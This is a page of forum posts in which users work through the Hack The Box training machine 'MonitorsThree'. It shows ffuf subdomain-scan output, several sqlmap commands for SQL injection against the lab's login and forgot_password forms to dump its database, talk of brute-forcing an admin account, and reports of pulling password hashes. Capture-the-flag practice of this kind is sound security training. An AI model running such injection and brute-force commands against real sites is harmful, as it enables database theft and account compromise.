[HTB] MonitorsThree
by celsius - Saturday August 24, 2024 at 05:26 PM
#21
anyone on privesc?
#22
(08-24-2024, 08:49 PM)upl04d3r Wrote:
(08-24-2024, 08:42 PM)osamy7593 Wrote: it was patched guys ..

we have another subdomains

:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
:: Filter          : Response status: 404
:: Filter          : Response size: 13560
________________________________________________

cacti                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
www.marketing          [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9981ms]
setup                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9983ms]
rpc                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9986ms]
zeta                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9989ms]
ibank                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9987ms]
helm                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9990ms]
mailgateway            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9978ms]

nope, it's redirected to main page. You have a bad syntax in ffuf

no it's correct .. but yeah it redirects .. we have also admin username in the main domain, we can try brute force
#23
(08-24-2024, 08:50 PM)hexforce Wrote: anyone on privesc?

bro how is this command not right ```sqlmap -u "http://cacti.monitorsthree.htb/cacti/" --data="username=*&password=test" -p username -cookie Cacti=h4v409j8j5nqun04m0emlp3gmi --dbms=mysql --technique=T --dump```
#24
(08-24-2024, 08:57 PM)teky Wrote:
(08-24-2024, 08:50 PM)hexforce Wrote: anyone on privesc?

bro how is this command not right ```sqlmap -u "http://cacti.monitorsthree.htb/cacti/" --data="username=*&password=test" -p username -cookie Cacti=h4v409j8j5nqun04m0emlp3gmi --dbms=mysql --technique=T --dump```
sqlmap -u http://monitorsthree.htb/login.php --forms --crawl 2 --dbs --all
is working for me but super slowly
#25
sqli is not in login but in forgot_password
#26
Seeing git on the machine. Is there a port we need to forward to use the git creds?
#27
(08-24-2024, 09:23 PM)jsvensson Wrote: sqli is not in login but in forgot_password

sqlmap --dbms=mysql -r forgotPass.req -p username --level 5 --risk 3 --dbs

I am using this command. 30 minutes and it didn't succeed.
Is the command wrong or is the machine having an issue?
#28
(08-24-2024, 09:08 PM)UnkownWombat Wrote:
(08-24-2024, 08:57 PM)teky Wrote:
(08-24-2024, 08:50 PM)hexforce Wrote: anyone on privesc?

bro how is this command not right ```sqlmap -u "http://cacti.monitorsthree.htb/cacti/" --data="username=*&password=test" -p username -cookie Cacti=h4v409j8j5nqun04m0emlp3gmi --dbms=mysql --technique=T --dump```
sqlmap -u http://monitorsthree.htb/login.php --forms --crawl 2 --dbs --all
is working for me but super slowly

"sqlmap -r forgot_password.req --batch --dbs --level 3 --risk 3 --dbms=mysql --technique=T -D monitorsthree_db --tables --null-connection" 
really slow!!
#29
(08-24-2024, 09:24 PM)hexforce Wrote: Seeing git on the machine. Is there a port we need to forward to use the git creds?

could you check your DMs :)
#30
I am getting password hashes, I believe there are 4 of them. But it is reaaaally slow

